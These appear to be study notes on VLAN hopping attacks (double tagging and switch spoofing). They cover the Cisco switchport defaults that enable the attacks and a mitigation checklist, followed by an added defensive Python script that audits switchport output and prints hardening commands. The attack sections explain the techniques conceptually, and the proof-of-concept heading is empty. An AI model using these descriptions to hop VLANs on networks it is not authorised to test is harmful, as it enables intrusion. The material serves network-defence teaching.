VLAN Hopping
Attack Types:
- Double Tagging: By adding two different VLAN tags to the frame being transmitted, the attacker can trick the device into treating the packet as if it were sent from the VLAN specified by the first VLAN tag.
- Switch Spoofing: The attacker imitates a trunking switch, sending the tagging and trunking protocol messages needed to negotiate and maintain a trunk, and thereby gains access to the VLANs carried on it.
Double Tagging
- This is one-way traffic: the attacker can inject frames but cannot get data back.
Attacks
ICMP PoC:
Mitigation
Switch Spoofing
- Bad switch defaults make this attack possible, including:
  - DTP being allowed on the port
  - automatic negotiation of a trunk
  - VLAN 1 being used as the native VLAN
Bad Cisco Configuration:
show int gig0/13 switchport
- Administrative mode: Dynamic Auto
- Administrative Trunking Encapsulation: negotiate
- Operation mode: static access
- Negotiation of Trunking: On
- Access Mode VLAN: 1
- Trunking Native Mode VLAN: 1
- Trunking VLANS Enabled: All
show int trunk
- Verify that the gig0/13 port does not have a trunk set
Attacks
VLAN Hopping Concept, Attack example and Prevention
Initial start:
Mitigation
Set all of the unused ports on the switch to these configurations:
- Set the switchport so that it is not an access port
- Set the switchport’s VLAN to an unused VLAN that has no connections to anything else
- Disable DTP on the port
- Set the native VLAN to one that is not used and does not go anywhere
- Administratively shut down the switchport
- Never use VLAN 1 for anything, unless you must in order to integrate with other vendors' devices.
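The following script is an added example and is not part of the original notes. It ties together the bad Cisco configuration shown under Switch Spoofing and the mitigation list above: it parses the text of a `show interfaces switchport` command, flags each of the risky settings the notes call out (dynamic/DTP-negotiable mode, trunk negotiation on, access VLAN 1, native VLAN 1, a trunk carrying all VLANs), and prints the interface commands that would bring a non-compliant port in line with the mitigation list. The sample output is constructed, modelled on the field names of Cisco IOS `show interfaces switchport`; the unused sink VLAN number 999 and the exact remediation commands are assumptions made here, not something the notes prescribe.

```python
"""Audit 'show interfaces switchport' text for VLAN-hopping exposure.

Added example, not from the original notes.  Assumptions: the sample
output is constructed (field names modelled on Cisco IOS), VLAN 999 is
an unused sink VLAN, and the remediation commands reflect the notes'
mitigation list as interpreted here.
"""
import re

# Constructed sample: Gi0/13 mirrors the bad defaults listed in the notes,
# Gi0/14 is a hardened unused port.
SAMPLE_OUTPUT = """\
Name: Gi0/13
Switchport: Enabled
Administrative Mode: dynamic auto
Operational Mode: static access
Administrative Trunking Encapsulation: negotiate
Negotiation of Trunking: On
Access Mode VLAN: 1 (default)
Trunking Native Mode VLAN: 1 (default)
Trunking VLANs Enabled: ALL

Name: Gi0/14
Switchport: Enabled
Administrative Mode: static access
Operational Mode: down
Administrative Trunking Encapsulation: dot1q
Negotiation of Trunking: Off
Access Mode VLAN: 999 (BLACKHOLE)
Trunking Native Mode VLAN: 999 (BLACKHOLE)
Trunking VLANs Enabled: ALL
"""

UNUSED_VLAN = 999  # assumption: VLAN with no SVI and no other members


def parse_switchport(text):
    """Return {interface name: {field: value}} from the command output."""
    ports = {}
    current = None
    for line in text.splitlines():
        if ":" not in line:
            continue  # blank lines and decorations
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Name":
            current = value
            ports[current] = {}
        elif current is not None:
            ports[current][key] = value
    return ports


def _vlan_number(value):
    """'1 (default)' -> 1; None when the value has no leading number."""
    m = re.match(r"(\d+)", value)
    return int(m.group(1)) if m else None


def audit_port(fields):
    """List the VLAN-hopping-relevant findings for one interface."""
    findings = []
    admin_mode = fields.get("Administrative Mode", "").lower()
    if admin_mode.startswith("dynamic"):
        findings.append("DTP-negotiable mode (%s): a peer can bring up a trunk" % admin_mode)
    if fields.get("Negotiation of Trunking", "").lower() == "on":
        findings.append("DTP negotiation enabled")
    if _vlan_number(fields.get("Access Mode VLAN", "")) == 1:
        findings.append("access VLAN is VLAN 1")
    if _vlan_number(fields.get("Trunking Native Mode VLAN", "")) == 1:
        findings.append("native VLAN is VLAN 1 (double-tagging prerequisite)")
    if (fields.get("Operational Mode", "").lower() == "trunk"
            and fields.get("Trunking VLANs Enabled", "").upper() == "ALL"):
        findings.append("trunk carries all VLANs; prune to those required")
    return findings


def audit(text):
    """Map each interface to its findings; an empty list means compliant."""
    return {name: audit_port(f) for name, f in parse_switchport(text).items()}


def remediation(name, shut=True):
    """IOS interface commands implementing the notes' mitigation list (assumed)."""
    cmds = ["interface %s" % name,
            " switchport mode access",                      # fixed, non-trunk role
            " switchport nonegotiate",                      # disable DTP
            " switchport access vlan %d" % UNUSED_VLAN,     # unused sink VLAN
            " switchport trunk native vlan %d" % UNUSED_VLAN]  # native VLAN not 1
    if shut:
        cmds.append(" shutdown")                            # unused port stays down
    return cmds


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_OUTPUT).items():
        print(name, "OK" if not findings else "NON-COMPLIANT")
        for finding in findings:
            print("  -", finding)
        if findings:
            print("\n".join(remediation(name)))
```

Run it on a saved `show interfaces switchport` capture instead of the sample to get a per-port list; the `Operational Mode` check only fires for ports that are actually trunking, so access ports that merely allow all VLANs are reported through the DTP and native-VLAN findings rather than the pruning one.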